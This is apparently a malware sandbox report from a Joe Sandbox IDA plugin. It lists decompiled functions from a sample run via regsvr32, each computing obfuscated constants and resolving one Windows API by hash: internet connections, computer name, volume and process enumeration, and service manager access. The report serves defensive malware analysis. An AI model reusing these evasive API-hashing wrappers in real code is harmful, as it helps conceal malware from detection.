Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: jx'
API String ID: 2962429428-4176335217
Opcode ID: c319d7e51e3d158657fd734818a1be8457d04070cb65192626139d701a511ec5
Instruction ID: e4fe0ca209291fc11c00206b46f5d35e2329bf12cb07dee034d36289e906f7d0
Opcode Fuzzy Hash: c319d7e51e3d158657fd734818a1be8457d04070cb65192626139d701a511ec5
Instruction Fuzzy Hash: 93018770D0130CFBDB04EFA9CA0A9DEBBB4EF04314F10C199A90066261E3B40F1A9F96

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD3A Relevance: 1.6, APIs: 1, Instructions: 72
networkCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040AD3A(void* __ecx, void* __edx, intOrPtr _a4, long _a8, WCHAR* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, signed int _a36, intOrPtr _a44, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t56;
				signed int _t58;
				short _t64;

				_t64 = _a36;
				_push(0);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(0);
				_push(_t64 & 0x0000ffff);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				E00402528(_t64 & 0x0000ffff);
				_v24 = 0xda540;
				_v20 = 0x3dab4;
				_v16 = 0xe42d7;
				_v8 = 0x86b639;
				_t58 = 0x1f;
				_v8 = _v8 / _t58;
				_v8 = _v8 + 0xffffc0ea;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x02062489;
				_v12 = 0xe0618;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x00e37daf;
				_a36 = 0x6a9f08;
				_a36 = _a36 * 0x17;
				_a36 = _a36 ^ 0xe35ea94f;
				_a36 = _a36 | 0xd4be09ed;
				_a36 = _a36 ^ 0xfeffaff8;
				E00406F64(0x210b555c, _t58, _t58, 0x2f4e66fe, 0x6d);
				_t56 = InternetConnectW(_a32, _a16, _t64, 0, 0, _a8, 0, 0); // executed
				return _t56;
			}

0x0040ad41
0x0040ad4a
0x0040ad4b
0x0040ad4c
0x0040ad4f
0x0040ad52
0x0040ad53
0x0040ad54
0x0040ad57
0x0040ad5a
0x0040ad5d
0x0040ad60
0x0040ad63
0x0040ad64
0x0040ad67
0x0040ad6c
0x0040ad71
0x0040ad7b
0x0040ad84
0x0040ad8b
0x0040ad97
0x0040ad9c
0x0040ad9f
0x0040ada6
0x0040adaa
0x0040adb1
0x0040adb8
0x0040adbc
0x0040adc3
0x0040adda
0x0040addd
0x0040ade4
0x0040adeb
0x0040adfb
0x0040ae11
0x0040ae18

APIs

InternetConnectW.WININET(?,000DA540,?,00000000,00000000,000E42D7,00000000,00000000), ref: 0040AE11

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: ConnectInternet
String ID:
API String ID: 3050416762-0
Opcode ID: 03de2674f49014dd2eb60710994797995b542d6ee14b45229c48bb66e18a53aa
Instruction ID: 1235eecb0d484cc6e928b9185f4258b7668df66a5617655907d91e5e76afc700
Opcode Fuzzy Hash: 03de2674f49014dd2eb60710994797995b542d6ee14b45229c48bb66e18a53aa
Instruction Fuzzy Hash: 5D214472800208BBCF01DFA6DD49CDE7FB9EB89718F114159FA08A6250D3B18A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5B0 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040D5B0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t37;
				intOrPtr* _t45;
				void* _t46;
				signed int _t49;
				void* _t54;
				void* _t55;

				_t55 = __edx;
				_t54 = __ecx;
				E00402528(_t37);
				_v28 = 0xad39f;
				_v24 = 0xde296;
				_v20 = 0;
				_v8 = 0x70c466;
				_v8 = _v8 << 0xc;
				_t49 = 7;
				_v8 = _v8 * 0x2d;
				_v8 = _v8 / _t49;
				_v8 = _v8 ^ 0x05ce2cd5;
				_v16 = 0xa4ad72;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x2b5a0495;
				_v12 = 0x520372;
				_v12 = _v12 ^ 0x172d204c;
				_v12 = _v12 + 0xffffaf49;
				_v12 = _v12 ^ 0x1774e52f;
				_t45 = E00406F64(0xb0aa831, _t49, _t49, 0xfd28539d, 0x245);
				_t46 =  *_t45(0, _t54, 0, 0, _t55, __ecx, __edx, _a4, _a8, _a12, _a16, 0, _a24, 0, 0); // executed
				return _t46;
			}

0x0040d5bb
0x0040d5c2
0x0040d5d3
0x0040d5d8
0x0040d5e2
0x0040d5eb
0x0040d5ee
0x0040d5f5
0x0040d5ff
0x0040d60a
0x0040d613
0x0040d616
0x0040d61d
0x0040d624
0x0040d628
0x0040d62f
0x0040d636
0x0040d63d
0x0040d644
0x0040d65a
0x0040d667
0x0040d66f

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0040D667

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 6a8e178e5b7794f17f48e07aa8d57b4284b2e2fbe993bae98b552556c56684d5
Instruction ID: 68feca0a8e1da25e35c5c788058e0e634cba78d81ddaa286db632fa26f473590
Opcode Fuzzy Hash: 6a8e178e5b7794f17f48e07aa8d57b4284b2e2fbe993bae98b552556c56684d5
Instruction Fuzzy Hash: F12156B1D0020CFFDF04DFA5DC898AEBBB9EB49354F208499F915AA291D2B45F109B60

Uniqueness

Uniqueness Score: -1.00%

Function 00419D52 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00419D52(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a24, WCHAR* _a36, DWORD* _a44, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				void* _t35;
				int _t43;
				signed int _t45;

				_push(_a48);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(0);
				E00402528(_t35);
				_v24 = 0xe5a57;
				_v20 = 0;
				_v16 = 0x3e0dd1;
				_v16 = _v16 + 0xbec3;
				_v16 = _v16 ^ 0x003d29c2;
				_v8 = 0x71a4cd;
				_t45 = 0x7e;
				_v8 = _v8 / _t45;
				_v8 = _v8 ^ 0x010aa54c;
				_v8 = _v8 ^ 0x0109d008;
				_v12 = 0x10a1a9;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0xa1a531ad;
				E00406F64(0xe1f817a9, _t45, _t45, 0xbfd2d08a, 0xa5);
				_t43 = GetVolumeInformationW(_a36, 0, 0, _a44, 0, 0, 0, 0); // executed
				return _t43;
			}

0x00419d59
0x00419d5e
0x00419d61
0x00419d62
0x00419d65
0x00419d66
0x00419d67
0x00419d6a
0x00419d6b
0x00419d6c
0x00419d6f
0x00419d72
0x00419d75
0x00419d7a
0x00419d84
0x00419d89
0x00419d90
0x00419d97
0x00419d9e
0x00419daa
0x00419db2
0x00419db5
0x00419dbc
0x00419dc3
0x00419dca
0x00419dce
0x00419dea
0x00419dfe
0x00419e04

APIs

GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00419DFE

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: b91a9483c1858292277132fe0183b6f659b6207c2fa7d6b7895b974fc9417b6f
Instruction ID: 775468c5d81e35852737a5253067df36ce86b08f9adc33492d56ca2f10c83eb3
Opcode Fuzzy Hash: b91a9483c1858292277132fe0183b6f659b6207c2fa7d6b7895b974fc9417b6f
Instruction Fuzzy Hash: F7112971902218BBDB15DFA6CD09CDF7FB9FF463A4F508148B51862150D3B24A64DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00415053 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00415053(void* __ecx, intOrPtr _a4, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short* _v20;
				short* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t40;
				void* _t50;
				signed int _t52;
				signed int _t53;

				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E00402528(_t40);
				_v32 = 0x2a9d;
				_v28 = 0xe590d;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0x93a489;
				_v16 = _v16 | 0xa6ef63c2;
				_v16 = _v16 ^ 0xa6f135cf;
				_v8 = 0x549a1b;
				_v8 = _v8 >> 0xe;
				_t52 = 0x71;
				_v8 = _v8 / _t52;
				_v8 = _v8 + 0xffff394e;
				_v8 = _v8 ^ 0xfff69fe6;
				_v12 = 0x6df274;
				_t53 = 0x21;
				_v12 = _v12 / _t53;
				_v12 = _v12 + 0xaad;
				_v12 = _v12 ^ 0x000c8a78;
				E00406F64(0x16a6f636, _t53, _t53, 0x28caee4, 0x10f);
				_t50 = OpenSCManagerW(0, 0, _a12); // executed
				return _t50;
			}

0x0041505a
0x0041505f
0x00415060
0x00415063
0x00415065
0x0041506a
0x00415074
0x0041507d
0x00415080
0x00415083
0x0041508a
0x00415091
0x00415098
0x0041509f
0x004150a8
0x004150ad
0x004150b2
0x004150b9
0x004150c0
0x004150ca
0x004150d2
0x004150d5
0x004150dc
0x004150f8
0x00415105
0x0041510b

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,04DBE7AE,?,?,?,?,?,?,?,?,000003D7), ref: 00415105

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 1b02d926d69d7703f9aa8e0fc0065c6a9f18736441be3be71e5269cdcf9115d6
Instruction ID: 44b890a19702470cba370b6801a64b773c68d5eaed6aaa7429765fa5c3068653
Opcode Fuzzy Hash: 1b02d926d69d7703f9aa8e0fc0065c6a9f18736441be3be71e5269cdcf9115d6
Instruction Fuzzy Hash: 96113471E01209FBDB14DFEAC84A8DEBFB5EB45324F108089F514B6290D7B94B54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE8F Relevance: 1.6, APIs: 1, Instructions: 54
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040DE8F(void* __ecx, struct _WIN32_FIND_DATAW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t39;
				int _t47;
				signed int _t49;
				void* _t54;
				struct _WIN32_FIND_DATAW* _t55;

				_push(_a16);
				_t55 = __edx;
				_t54 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00402528(_t39);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v32 = 0xbe351;
				_v28 = 0xfde8d;
				_v16 = 0xe97fa3;
				_v16 = _v16 << 0xd;
				_v16 = _v16 ^ 0x2ffb1614;
				_v12 = 0x19392;
				_v12 = _v12 ^ 0x6f2fce03;
				_v12 = _v12 ^ 0xd34b6cc1;
				_v12 = _v12 ^ 0xbc6ed23a;
				_v8 = 0x4ba4b9;
				_v8 = _v8 | 0xe6dc70bb;
				_v8 = _v8 >> 2;
				_t49 = 0x64;
				_v8 = _v8 / _t49;
				_v8 = _v8 ^ 0x0098979b;
				E00406F64(0xba26d1fd, _t49, _t49, 0xbfd2d08a, 0x68);
				_t47 = FindNextFileW(_t54, _t55); // executed
				return _t47;
			}

0x0040de97
0x0040de9a
0x0040de9c
0x0040de9e
0x0040dea1
0x0040dea4
0x0040dea7
0x0040dea8
0x0040dea9
0x0040deae
0x0040deb5
0x0040debb
0x0040dec2
0x0040dec9
0x0040ded0
0x0040ded4
0x0040dedb
0x0040dee2
0x0040dee9
0x0040def0
0x0040def7
0x0040defe
0x0040df05
0x0040df0e
0x0040df13
0x0040df16
0x0040df32
0x0040df3c
0x0040df43

APIs

FindNextFileW.KERNEL32(36AD4FE0,?,?,?,?,?,?,?,?,?,36AD4FE0,00000067), ref: 0040DF3C

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 00e1f66e5d947d53c5c5472f6f61288674a0cd288a2ada7776b0e4422c784dbb
Instruction ID: 71277f576efec90e0507df15b837f111622973ea3ca3d5c79733d0f7a26592b9
Opcode Fuzzy Hash: 00e1f66e5d947d53c5c5472f6f61288674a0cd288a2ada7776b0e4422c784dbb
Instruction Fuzzy Hash: D9118B75D0120CBBCB04DFA6C94AAEEBFB1EF44714F108089E51463250D7B94B28EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040216E Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040216E(void* __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _v28;
				intOrPtr _v32;
				void* _t34;
				void* _t43;
				signed int _t45;
				void* _t51;

				_push(_a12);
				_t51 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00402528(_t34);
				_v32 = 0xa8d99;
				asm("stosd");
				asm("stosd");
				_t45 = 0x5d;
				asm("stosd");
				_v8 = 0x801b8c;
				_v8 = _v8 + 0xb63c;
				_v8 = _v8 + 0x64a0;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x00078271;
				_v16 = 0xc3659c;
				_v16 = _v16 + 0xa438;
				_v16 = _v16 ^ 0x00c6ab86;
				_v12 = 0xefb99d;
				_v12 = _v12 / _t45;
				_v12 = _v12 ^ 0x0005aece;
				E00406F64(0x80ecea7b, _t45, _t45, 0xbfd2d08a, 0x232);
				_t43 = RtlAllocateHeap(_t51, _a12, _a8); // executed
				return _t43;
			}

0x00402176
0x00402179
0x0040217b
0x0040217e
0x00402182
0x00402183
0x00402188
0x00402197
0x0040219c
0x0040219d
0x004021a8
0x004021a9
0x004021b0
0x004021b7
0x004021be
0x004021c2
0x004021c9
0x004021d0
0x004021d7
0x004021de
0x004021eb
0x004021ee
0x00402204
0x00402213
0x0040221a

APIs

RtlAllocateHeap.NTDLL(00000000,2DAE7FF2,00C6AB86,?,?,?,?,?,?,?,00000034,2DAE7FF2), ref: 00402213

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 24ddd830fcadf45edf11704f9ac6dfb218e9d89fef18f964a8764d4e10a52237
Instruction ID: 8b7fc4c24dfc046ce7e31017c00af726fff05f155d95419e1dfb77901eb870b5
Opcode Fuzzy Hash: 24ddd830fcadf45edf11704f9ac6dfb218e9d89fef18f964a8764d4e10a52237
Instruction Fuzzy Hash: 321149B5D00208FBDF04DFD5C80A8DEBBB5EF85324F008089F90466250D3B95B189F51

Uniqueness

Uniqueness Score: -1.00%

Function 00408951 Relevance: 1.5, APIs: 1, Instructions: 49
networkCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E00408951(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t28;
				void* _t34;

				_push(_a32);
				_push(0);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E00402528(_t28);
				_v28 = 0xc052e;
				_v24 = 0xdcd4a;
				_v20 = 0;
				_v16 = 0xb81db3;
				_v16 = _v16 ^ 0xf999ee67;
				_v16 = _v16 ^ 0xf921d96f;
				_v12 = 0x8bf2f1;
				_v12 = _v12 + 0xffff0a0d;
				_v12 = _v12 ^ 0x0080d661;
				_v8 = 0x9810a3;
				_v8 = _v8 ^ 0x82993fae;
				_v8 = _v8 ^ 0x820059a4;
				E00406F64(0xaed0a3be, __ecx, __ecx, 0x2f4e66fe, 0x1ff);
				_t34 = InternetOpenW(0, _a12, 0, 0, 0); // executed
				return _t34;
			}

0x00408958
0x0040895d
0x0040895e
0x0040895f
0x00408960
0x00408963
0x00408966
0x00408969
0x0040896d
0x0040896e
0x00408973
0x0040897d
0x00408984
0x00408987
0x0040898e
0x00408995
0x0040899c
0x004089a3
0x004089aa
0x004089b1
0x004089b8
0x004089bf
0x004089e0
0x004089ef
0x004089f5

APIs

InternetOpenW.WININET(00000000,?,00000000,00000000,00000000), ref: 004089EF

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 0b299aea3608a4f152790342b5cb854a9f3541d9ce180ab56c879117324a2fe6
Instruction ID: e7fb5434689e6a8e2872586296d246aed8ce4162ecbbbb06c0d5c32efcbf0f9e
Opcode Fuzzy Hash: 0b299aea3608a4f152790342b5cb854a9f3541d9ce180ab56c879117324a2fe6
Instruction Fuzzy Hash: 53114572812219BBCB109FE58D098DFBFB9EF05350F108188B91966210D3B10A60DFE5

Uniqueness

Uniqueness Score: -1.00%

Function 004070A4 Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004070A4(CHAR* __ecx, void* __edx, intOrPtr _a4, DWORD* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t35;
				int _t43;
				signed int _t45;
				CHAR* _t50;

				_push(_a8);
				_t50 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00402528(_t35);
				_v20 = _v20 & 0x00000000;
				_v32 = 0x1da17;
				_v28 = 0x4741e;
				_v24 = 0xb8619;
				_v16 = 0x6cd237;
				_v16 = _v16 + 0x133;
				_v16 = _v16 ^ 0x006c4515;
				_v12 = 0xda411f;
				_v12 = _v12 + 0xffff2112;
				_v12 = _v12 ^ 0x00d4d350;
				_v8 = 0xdd8308;
				_v8 = _v8 >> 2;
				_v8 = _v8 + 0xffff1ac3;
				_t45 = 0x50;
				_v8 = _v8 / _t45;
				_v8 = _v8 ^ 0x000ad56f;
				E00406F64(0xef36e1d7, _t45, _t45, 0xbfd2d08a, 0x34);
				_t43 = GetComputerNameA(_t50, _a8); // executed
				return _t43;
			}

0x004070ab
0x004070ae
0x004070b0
0x004070b4
0x004070b5
0x004070ba
0x004070c1
0x004070ca
0x004070d1
0x004070d8
0x004070df
0x004070e6
0x004070ed
0x004070f4
0x004070fb
0x00407102
0x00407109
0x0040710d
0x00407119
0x0040711e
0x00407121
0x0040713d
0x00407149
0x0040714f

APIs

GetComputerNameA.KERNEL32(?,006C4515,?,?,?,?,?,?,?,0003B78A), ref: 00407149

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 27e8df280dc0d01aa6afb586dbf546d28d8a8e62cff43694af02fc06a777969f
Instruction ID: 5ea26da8f46d1a8991d687c4052018b840295cc53062f1e7c891208693e1b7b2
Opcode Fuzzy Hash: 27e8df280dc0d01aa6afb586dbf546d28d8a8e62cff43694af02fc06a777969f
Instruction Fuzzy Hash: 771148B5D01208FBDB00EFE5C90AAEEBBB5EF50318F50808AE51467280D7B55B14DF94

Uniqueness

Uniqueness Score: -1.00%

Function 0041A103 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041A103(void* __ecx, void* __edx, intOrPtr _a4, struct tagPROCESSENTRY32W* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t33;
				void* _t40;
				signed int _t42;
				void* _t47;

				_push(_a8);
				_t47 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00402528(_t33);
				_v28 = 0x4ef04;
				_v24 = 0x774f5;
				_v20 = 0x8d4ea;
				_v16 = 0x930695;
				_v16 = _v16 + 0xffffbbee;
				_v16 = _v16 ^ 0x0098cd8e;
				_v12 = 0xbcd4cc;
				_v12 = _v12 ^ 0xbd244cbf;
				_v12 = _v12 ^ 0xbd989c58;
				_v8 = 0x54f093;
				_t42 = 0x5e;
				_v8 = _v8 / _t42;
				_v8 = _v8 ^ 0xcba04e5c;
				_v8 = _v8 + 0xfffff34f;
				_v8 = _v8 ^ 0xcba14a83;
				_t40 = E00406F64(0x7968f67, _t42, _t42, 0xbfd2d08a, 0xc5);
				Process32FirstW(_t47, _a8); // executed
				return _t40;
			}

0x0041a10a
0x0041a10d
0x0041a10f
0x0041a112
0x0041a113
0x0041a114
0x0041a119
0x0041a123
0x0041a12c
0x0041a133
0x0041a13a
0x0041a141
0x0041a148
0x0041a14f
0x0041a156
0x0041a15d
0x0041a169
0x0041a171
0x0041a174
0x0041a17b
0x0041a182
0x0041a19e
0x0041a1aa
0x0041a1b0

APIs

Process32FirstW.KERNEL32(00000000,0098CD8E,?,?,?,?,?,?,?,00000000), ref: 0041A1AA

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: FirstProcess32
String ID:
API String ID: 2623510744-0
Opcode ID: 5d3bcd497e91d9683a31fa00ad596f4d30af2da3c640d1b1954fa938616ca591
Instruction ID: a9adefe46f14c36c83e6f6c881e69c121332a92c41bf5aa555068cb13b3a4cf8
Opcode Fuzzy Hash: 5d3bcd497e91d9683a31fa00ad596f4d30af2da3c640d1b1954fa938616ca591
Instruction Fuzzy Hash: 041148B1D05308FBCB14EFA9D90A89EBFB5EB40314F108299A918AB291D7B15B149F94

Uniqueness

Uniqueness Score: -1.00%

Function 00407293 Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00407293(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _t32;
				intOrPtr* _t40;
				void* _t41;
				void* _t45;

				_t45 = __edx;
				E00402528(_t32);
				_v20 = _v20 & 0x00000000;
				_v24 = 0x56465;
				_v12 = 0x3ab6b5;
				_v12 = _v12 + 0xffff324e;
				_v12 = _v12 * 0x67;
				_v12 = _v12 * 0x11;
				_v12 = _v12 ^ 0x8c170a4e;
				_v16 = 0x109dd4;
				_v16 = _v16 * 0x1a;
				_v16 = _v16 ^ 0x01be3dae;
				_v8 = 0x2c7cce;
				_v8 = _v8 >> 5;
				_v8 = _v8 + 0x5c14;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000c7130;
				_t40 = E00406F64(0xcd8fa898, __ecx, __ecx, 0xbfd2d08a, 0x275);
				_t41 =  *_t40(_t45, __ecx, __edx, _a4, _a8); // executed
				return _t41;
			}

0x0040729d
0x004072a4
0x004072a9
0x004072b0
0x004072b7
0x004072be
0x004072d5
0x004072e1
0x004072e4
0x004072eb
0x004072f6
0x004072f9
0x00407300
0x00407307
0x0040730b
0x00407312
0x00407316
0x00407326
0x0040732f
0x00407335

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040732F

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 2655de75fec98fed6a9bd9b4f94c7f2abc77a2db1418d84f0a7d8eac33dd2a1b
Instruction ID: 2d80445346282407c7bedb4119b20e1995209abd7db3861b90be14d928a8daec
Opcode Fuzzy Hash: 2655de75fec98fed6a9bd9b4f94c7f2abc77a2db1418d84f0a7d8eac33dd2a1b
Instruction Fuzzy Hash: D4111C71C01208BBCB04DFE9C94999EFBB4EF04304F608189E814B7291D3B55B44CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0041A952 Relevance: 1.5, APIs: 1, Instructions: 44
serviceCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0041A952(void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _t35;
				int _t44;
				signed int _t46;

				_push(_a8);
				_push(_a4);
				E00402528(_t35);
				_v20 = _v20 & 0x00000000;
				_v24 = 0x2ed56;
				_v16 = 0xd6c71c;
				_v16 = _v16 ^ 0xb803002a;
				_v16 = _v16 ^ 0xb8deec5c;
				_v8 = 0x70049b;
				_t46 = 0x74;
				_v8 = _v8 * 0x67;
				_v8 = _v8 << 1;
				_v8 = _v8 / _t46;
				_v8 = _v8 ^ 0x00c89d1a;
				_v12 = 0xe5b045;
				_v12 = _v12 >> 3;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x000283fc;
				E00406F64(0x39936f17, _t46, _t46, 0x28caee4, 0x23e);
				_t44 = CloseServiceHandle(_a8); // executed
				return _t44;
			}

0x0041a958
0x0041a95b
0x0041a960
0x0041a965
0x0041a96c
0x0041a975
0x0041a97c
0x0041a983
0x0041a98a
0x0041a997
0x0041a9a2
0x0041a9a5
0x0041a9ae
0x0041a9b1
0x0041a9b8
0x0041a9bf
0x0041a9c3
0x0041a9c7
0x0041a9dd
0x0041a9e8
0x0041a9ed

APIs

